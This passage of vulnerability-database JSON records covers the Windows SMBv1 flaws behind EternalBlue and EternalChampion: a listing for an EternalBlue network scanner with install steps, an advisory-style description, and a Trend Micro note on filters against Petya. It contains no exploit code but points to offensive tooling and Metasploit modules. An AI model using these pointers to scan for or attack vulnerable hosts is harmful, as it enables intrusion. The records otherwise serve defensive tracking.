"cvelist"], "edition": 15, "lastseen": "2019-10-18T14:34:20"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "[  ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. \n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[  ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) **\n", "edition": 18, "enchantments": {"dependencies": {"modified": "2020-02-25T04:36:32", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"], "type": "threatpost"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["CVE-2017-0144"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-02-25T04:36:32", "value": 7.7, "vector": "NONE"}}, "hash": "7bcf450eec2ef9fe0e5bb283ac6c29629b3e935b82879d222e88fdc7616601d6", "hashmap": [{"hash": "95d55efa8ae602b327bf293a3381d168", "key": "references"}, {"hash": "97d03efd613b8501d42c93b1d42747ec", "key": "toolHref"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "published"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "modified"}, {"hash": "1b52e5b85d1d34348a9126f4ca83d047", "key": "href"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "41bcfd3a3826e72c80143f1a952e3cdf", "key": "title"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "9df98113b3627a03ccb38f7f88ba42eb", "key": "description"}], "history": [], "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "id": "KITPLOIT:9146046356497464176", "lastseen": "2020-02-25T04:36:32", "modified": "2017-07-22T20:30:34", "objectVersion": "1.3", "published": "2017-07-22T20:30:34", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], "reporter": "KitPloit", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "toolHref": "https://github.com/peterpt/eternal_scanner", "type": "kitploit", "viewCount": 164}, "differentElements": ["cvelist"], "edition": 18, "lastseen": "2020-02-25T04:36:32"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2017-0144", "CVE-2018-10933"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "[  ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. \n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[  ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) **\n", "edition": 4, "enchantments": {"score": {"modified": "2018-10-23T03:26:00", "value": 5.0, "vector": "NONE"}}, "hash": "3d555cfff42a434c63abb880c5e49cd606fb1b96015e642970cf3989b61834e5", "hashmap": [{"hash": "95d55efa8ae602b327bf293a3381d168", "key": "references"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "97d03efd613b8501d42c93b1d42747ec", "key": "toolHref"}, {"hash": "793f1ce18d29ca6a9cd7829b2165b0a9", "key": "cvelist"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "published"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "modified"}, {"hash": "1b52e5b85d1d34348a9126f4ca83d047", "key": "href"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "41bcfd3a3826e72c80143f1a952e3cdf", "key": "title"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "9df98113b3627a03ccb38f7f88ba42eb", "key": "description"}], "history": [], "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "id": "KITPLOIT:9146046356497464176", "lastseen": "2018-10-23T03:26:00", "modified": "2017-07-22T20:30:34", "objectVersion": "1.3", "published": "2017-07-22T20:30:34", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], "reporter": "KitPloit", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "toolHref": "https://github.com/peterpt/eternal_scanner", "type": "kitploit", "viewCount": 138}, "differentElements": ["cvelist"], "edition": 4, "lastseen": "2018-10-23T03:26:00"}], "edition": 25, "hashmap": [{"key": "bulletinFamily", "hash": "4a931512ce65bdc9ca6808adf92d8783"}, {"key": "cvelist", "hash": "013b6203cead14382a8f19ad32d99966"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "9df98113b3627a03ccb38f7f88ba42eb"}, {"key": "href", "hash": "1b52e5b85d1d34348a9126f4ca83d047"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "c57d2ee468d93289dff158782f8ce588"}, {"key": "published", "hash": "c57d2ee468d93289dff158782f8ce588"}, {"key": "references", "hash": "95d55efa8ae602b327bf293a3381d168"}, {"key": "reporter", "hash": "aba454e3574969396c0dddcb45011dcc"}, {"key": "title", "hash": "41bcfd3a3826e72c80143f1a952e3cdf"}, {"key": "toolHref", "hash": "97d03efd613b8501d42c93b1d42747ec"}, {"key": "type", "hash": "4553be2119d862322dd6fec6bb385401"}], "hash": "802381a7d63d82558cabd735eca417dec3e11cd01b402fe60311a939491bb39c", "viewCount": 170, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0144"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198"]}, {"type": "symantec", "idList": ["SMNTC-96704"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:42031", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:47456"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-33313"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "fireeye", "idList": ["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "thn", "idList": ["THN:E18080D17705880B2E7B69B8AB125EA9", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "mssecure", "idList": ["MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-07-28T14:35:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-07-28T14:35:34", "rev": 2}}, "objectVersion": "1.6", "toolHref": "https://github.com/peterpt/eternal_scanner", "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}], "seebug": [{"type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "_object_type": "robots.models.seebug.SeebugBulletin", "viewCount": 43, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2017-11-19T11:59:54", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0146"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203"]}, {"type": "symantec", "idList": ["SMNTC-96707"]}, {"type": "saint", "idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-11-19T11:59:54", "rev": 2}}, "reporter": "Root", "title": "EternalChampion - Windows SMB Remote Code Execution Vulnerability (CVE-2017-0146)", "objectVersion": "1.5", "cvelist": ["CVE-2017-0146"], "bulletinFamily": "exploit", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "references": [], "enchantments_done": [], "modified": "2017-04-17T00:00:00", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\r\n\r\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\r\n\r\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.", "href": "https://www.seebug.org/vuldb/ssvid-92964", "history": [], "id": "SSV:92964", "status": "cve,details", "lastseen": "2017-11-19T11:59:54", "sourceData": "", "published": "2017-04-17T00:00:00", "immutableFields": [], "cvss2": {}, "cvss3": {}}], "trendmicroblog": [{"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-26-2017/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "history": [], "modified": "2017-06-30T12:00:57", "lastseen": "2017-06-30T14:19:55", "published": "2017-06-30T12:00:57", "description": "\n\nThe late 70s/early 80s American television show _Three\u2019s Company_ was one of my favorite shows growing up. The central theme of the show revolved around the lives of three roommates. Each episode usually involved a misunderstanding, then chaos would ensue. In the end, everything would turn out okay. Unfortunately, this week\u2019s episode of \u201cransomware in the news\u201d isn\u2019t over \u2013 there are still misunderstandings about the latest attack named \u201cPetya,\u201d even on what to call it!\n\nThis past Tuesday, a ransomware attack similar to WannaCry shut down computers all over the world. It was initially thought that this new attack was an updated version of Petya from 2016. Others said it was a whole new malware that had Petya characteristics. Even further, now there is speculation that it\u2019s not ransomware at all \u2013 that its objective was to permanently destroy data. No extortion \u2013 just destruction \u2013 and no happy ending to this week\u2019s episode.\n\nTrend Micro TippingPoint continues to actively review the situation in order to recommend coverage for customers using TippingPoint solutions. As of this blog posting, we have verified the following vulnerability Digital Vaccine\u00ae (DV) filters that protect against the propagation of the Petya ransomware listed in the table below:\n\n \n\n**CVE Number** | **DV Filter(s)** | **Category** | **Default Deployment** | **Comments** \n---|---|---|---|--- \nCVE-2017-0144\n\nCVE-2017-0146 | 27298 | Vulnerabilities | Disabled | SMB: Microsoft Windows SMB Remote Code Execution Vulnerability (EternalBlue) \nCVE-2017-0147 | 27931 | Vulnerabilities | Disabled | SMB: Microsoft Windows SMBv1 Information Disclosure Vulnerability (EternalRomance) \n \n \n\nCustomers who wish to enforce generic policy at the network perimeter can use the following security policy filter to block all inbound SMBv1 traffic:\n\n \n\n**CVE Number** | **DV Filter(s)** | **Category** | **Default Deployment** | **Comments** \n---|---|---|---|--- \nNone | 28471 | Security Policy | Disabled | SMB: SMBv1 Successful Protocol Negotiation \n \n \n\nCustomers with questions or who need technical assistance can contact the TippingPoint Technical Assistance Center (TAC). For further information related to Trend Micro\u2019s response and our recommendations as a whole, please visit <https://success.trendmicro.com/solution/1117665>.\n\n \n\n**Zero-Day Filters**\n\nThere are nine new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) web site.\n\n \n\n**_Foxit (4)_**\n\n * 28746: ZDI-CAN-4721: Zero Day Initiative Vulnerability (Foxit Reader)\n * 28747: ZDI-CAN-4722: Zero Day Initiative Vulnerability (Foxit Reader)\n * 28748: ZDI-CAN-4723: Zero Day Initiative Vulnerability (Foxit Reader)\n * 28749: ZDI-CAN-4855: Zero Day Initiative Vulnerability (Foxit Reader)\n\n**_ _**\n\n**_Hewlett Packard Enterprise (1)_**\n\n * 28898: ZDI-CAN-4869: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n\n**_ _**\n\n**_Quest (4)_**\n\n * 28751: ZDI-CAN-4224,4225,4229-4235,4237,4286,4316: Zero Day Initiative Vulnerability(Quest NetVault Backup)\n * 28893: ZDI-CAN-4226-4228: Zero Day Initiative Vulnerability (Quest NetVault Backup)\n * 28894: ZDI-CAN-4238,4287,4289,4292,4294: Zero Day Initiative Vulnerability (Quest NetVault Backup)\n * 28896: ZDI-CAN-4752: Zero Day Initiative Vulnerability (Quest NetVault Backup)\n\n**_ _**\n\n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-19-2017/>).", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 26, 2017", "cvelist": ["CVE-2017-0144", "CVE-2017-0147", "CVE-4226-4228", "CVE-2017-0146"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 204, "enchantments": {"score": {"value": 8.0, "vector": "NONE", "modified": "2017-06-30T14:19:55", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96704", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700099.PRM", 